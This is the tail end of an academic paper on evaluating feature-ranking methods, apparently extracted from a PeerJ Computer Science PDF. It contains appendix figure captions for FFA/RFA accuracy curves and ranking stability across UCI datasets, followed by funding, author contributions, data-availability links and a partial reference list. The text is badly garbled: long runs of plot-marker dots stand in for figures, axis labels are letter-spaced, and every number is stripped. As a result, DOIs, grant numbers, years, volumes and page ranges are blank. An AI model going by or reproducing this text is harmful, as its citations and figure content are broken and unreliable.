comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets chess (a, c and e) and diabetes (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●● ●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ●● ●●●●●●● ●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets diversity (a, c and e) and german (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets heart-c (a, c and e) and heart-h (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets heart (a, c and e) and hepatitis (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets image (a, c and e) and ionosphere (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ●● ●●● ●●●●●●●●●● ●●● ●●● ●●●● ●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●● ●●●●●●●● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets iris (a, c and e) and sonar (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets tic-tac-toe (a, c and e) and vote (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets waveform (a, c and e) and wine (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was supported by the ad futura slovene human resources development and scholarship fund, slovenian research agency (through the grants j - and n - and a young researcher grant), the european commission through the grants tailor (h -ict- ) and ai eu (h -ict- ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: the ad futura slovene human resources development and scholarship fund, slovenian research agency: j - and n - . tailor (h -ict- ) and ai eu (h -ict- ). competing interests the authors declare that they have no competing interests. author contributions � ivica slavkov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � matej petković performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � pierre geurts conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � dragi kocev conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � sašo džeroski conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code for constructing the curves is available at github: https://github.com/ petkomat/fr-eval-curves. the code for constructing the feature rankings and predictive models used the methods (feature ranking and predictive modeling) implemented in weka . : https://www.cs. waikato.ac.nz/~ml/weka/. the following datasets are available from the uci repository: https://archive.ics.uci.edu/ ml/datasets.php credit approval, arrhythmia, balance scale, breast cancer wisconsin (original), breast cancer, car evaluation, chess (king-rook vs. king-pawn), statlog (german credit slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/petkomat/fr-eval-curves https://github.com/petkomat/fr-eval-curves https://www.cs.waikato.ac.nz/&#x e;ml/weka/ https://www.cs.waikato.ac.nz/&#x e;ml/weka/ https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets/statlog+% australian+credit+approval% https://archive.ics.uci.edu/ml/datasets/arrhythmia https://archive.ics.uci.edu/ml/datasets/balance+scale https://archive.ics.uci.edu/ml/datasets/breast+cancer+wisconsin+% original% https://archive.ics.uci.edu/ml/datasets/breast+cancer https://archive.ics.uci.edu/ml/datasets/car+evaluation https://archive.ics.uci.edu/ml/datasets/chess+% king-rook+vs.+king-pawn% https://archive.ics.uci.edu/ml/datasets/statlog+% german+credit+data% http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data), statlog (heart), heart disease (for cleveland and hungarian data), hepatitis, image segmentation, ionosphere, iris, connectionist bench (sonar, mines vs. rocks), tic-tac-toe endgame, congressional voting records, waveform database generator (version ), wine. the pima indians diabetes data (previously available at the uci repository) is now available at openml: https://www.openml.org/d/ . the following datasets are available from the bioinformatics laboratory: https://file.biolab.si/biolab/supp/bi-cancer/projections/index.html. aml prognosis, bladder cancer, breast cancer, childhood all, cml treatment, breast & colon (colon part of the data set), dlbcl, leukemia, mll, prostate, srbct. three additional datasets (aapc, diversity, water) are available at gitlab: http://source.ijs.si/data/classification-data. references aha d, kibler d. . instance-based learning algorithms. machine learning : – . arceo-vilas a, fernandez-lozano c, pita s, pértega-díaz s, pazos a. . a redundancy- removing feature selection algorithm for nominal data. peerj computer science :e doi . /peerj-cs. . bakr gh, hofmann t, schölkopf b, smola aj, taskar b, vishwanathan sv. . predicting structured data. cambridge: the mit press. biesiada j, duch w, kachel a, paucha s. . feature ranking methods based on information entropy with parzen windows. in: international conference on research in electrotechnology and applied informatics, katowice, poland. boucheham a, batouche m. . robust biomarker discovery for cancer diagnosis based on meta-ensemble feature selection. in: science and information conference. – . breiman l. . random forests. machine learning ( ): – doi . /a: . cortes c, vapnik v. . support-vector networks. machine learning ( ): – . duch w, wieczorek t, biesiada j. . comparison of feature ranking methods based on information entropy. in: ieee international conference on neural networks - conference proceedings. vol. . piscataway: ieee, – . džeroski s, demšar d, grbović j. . predicting chemical parameters of river water quality from bioindicator data. applied intelligence ( ): – doi . /a: . džeroski s, potamias g, moustakis v, charissis g. . automated revision of expert rules for treating acute abdominal pain in children. in: artificial intelligence in medicine - aime, lncs , – . furlanello c, serafini m, merler s, jurman g. . entropy-based gene ranking without selection bias for the predictive classification of microarray data. bmc bioinformatics ( ): doi . / - - - . guyon i, weston j, barnhill s, vapnik v. . gene selection for cancer classification using support vector machines. machine learning ( / ): – doi . /a: . guzmán-martnez r, alaiz-rodrguez r. . feature selection stability assessment based on the jensen-shannon divergence. lecture notes in computer science : – . henzgen s, hüllermeier e. . weighted rank correlation: a flexible approach based on fuzzy order relations. in: appice a, rodrigues pp, santos costa v, gama j, jorge a, soares c, eds. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/datasets/statlog+% german+credit+data% https://archive.ics.uci.edu/ml/datasets/statlog+(heart) https://archive.ics.uci.edu/ml/datasets/heart+disease https://archive.ics.uci.edu/ml/datasets/hepatitis https://archive.ics.uci.edu/ml/datasets/image+segmentation https://archive.ics.uci.edu/ml/datasets/ionosphere https://archive.ics.uci.edu/ml/datasets/iris https://archive.ics.uci.edu/ml/datasets/connectionist+bench+% sonar% c+mines+vs.+rocks% https://archive.ics.uci.edu/ml/datasets/tic-tac-toe+endgame https://archive.ics.uci.edu/ml/datasets/congressional+voting+records https://archive.ics.uci.edu/ml/datasets/waveform+database+generator+(version+ ) https://archive.ics.uci.edu/ml/datasets/waveform+database+generator+(version+ ) https://archive.ics.uci.edu/ml/datasets/wine https://www.openml.org/d/ https://file.biolab.si/biolab/supp/bi-cancer/projections/index.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/amlgse .html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/bladdergse .html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/bcgse _ .html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/allgse _pred_poth.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/cmlgse .html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/bc_ccgse _frozen.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/dlbcl.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/leukemia.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/mll.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/prostata.html https://file.biolab.si/biolab/supp/bi-cancer/projections/info/srbct.html http://source.ijs.si/data/classification-data http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /a: http://dx.doi.org/ . /a: http://dx.doi.org/ . / - - - http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ machine learning and knowledge discovery in databases. berlin: springer international publishing, – . john gh, langley p. . estimating continuous distributions in bayesian classifiers. in: proc. eleventh conference on uncertainty in artificial intelligence, san mateo, ca. burlington: morgan kaufmann, – . jong k, mary j, cornuéjols a, marchiori e, sebag m. . ensemble feature ranking. in: pkdd - lncs . – . jurman g, merler s, barla a, paoli s, galea a, furlanello c. . algebraic stability indicators for ranked lists in molecular profiling. bioinformatics ( ): – doi . /bioinformatics/btm . kalousis a, prados j, hilario m. . stability of feature selection algorithms: a study on high-dimensional spaces. knowledge and information systems ( ): – doi . /s - - - . khoshgoftaar tm, fazelpour a, wang h, wald r. . a survey of stability analysis of feature subset selection techniques. in: ieee th international conference on information reuse integration (iri). piscataway: ieee, – . lance gn, williams wt. . computer programs for hierarchical polythetic classification (‘similarity analyses’). computer journal ( ): – doi . /comjnl/ . . . lance gn, williams wt. . mixed-data classificatory programs i-agglomerative systems. australian computer journal : – . li z, gu w. . a redundancy-removing feature selection algorithm for nominal data. peerj computer science :e doi . /peerj.preprints. v . liang j, yang s, winstanley a. . invariant optimal feature selection: a distance discriminant and feature ranking based solution. pattern recognition ( ): – doi . /j.patcog. . . . liu t, liu s, chen z, ma w-y. . an evaluation on feature selection for text clustering. in: fawcett t, mishra n, eds. icml. menlo park: the aaai press, – . mramor m, leban g, demšar j, zupan b. . visualization-based cancer microarray data classification analysis. bioinformatics ( ): – doi . /bioinformatics/btm . muja m, lowe dg. . fast approximate nearest neighbors with automatic algorithm configuration. in: ranchordas a, araújo h, eds. visapp ( ). porto: insticc press, – . nardone d, ciaramella a, staiano a. . a redundancy-removing feature selection algorithm for nominal data. peerj computer science :e doi . /peerj-cs. . newman cbd, merz c. . uci repository of machine learning databases. available at http://archive.ics.uci.edu/ml/index.php (accessed december ). nilsson r, peña jm, björkegren j, tegnér j. . consistent feature selection for pattern recognition in polynomial time. journal of machine learning research : – . nogueira s, sechidis k, brown g. . on the stability of feature selection algorithms. journal of machine learning research ( ): – . paoli s, jurman g, albanese d, merler s, furlanello c. . semisupervised profiling of gene expressions and clinical data. in: proc. sixth international conference on fuzzy logic and applications. – . quinlan r. . c . : programs for machine learning. san mateo: morgan kaufmann publishers. robnik-Šikonja m, kononenko i. . theoretical and empirical analysis of relieff and rrelieff. machine learning ( / ): – doi . /a: . 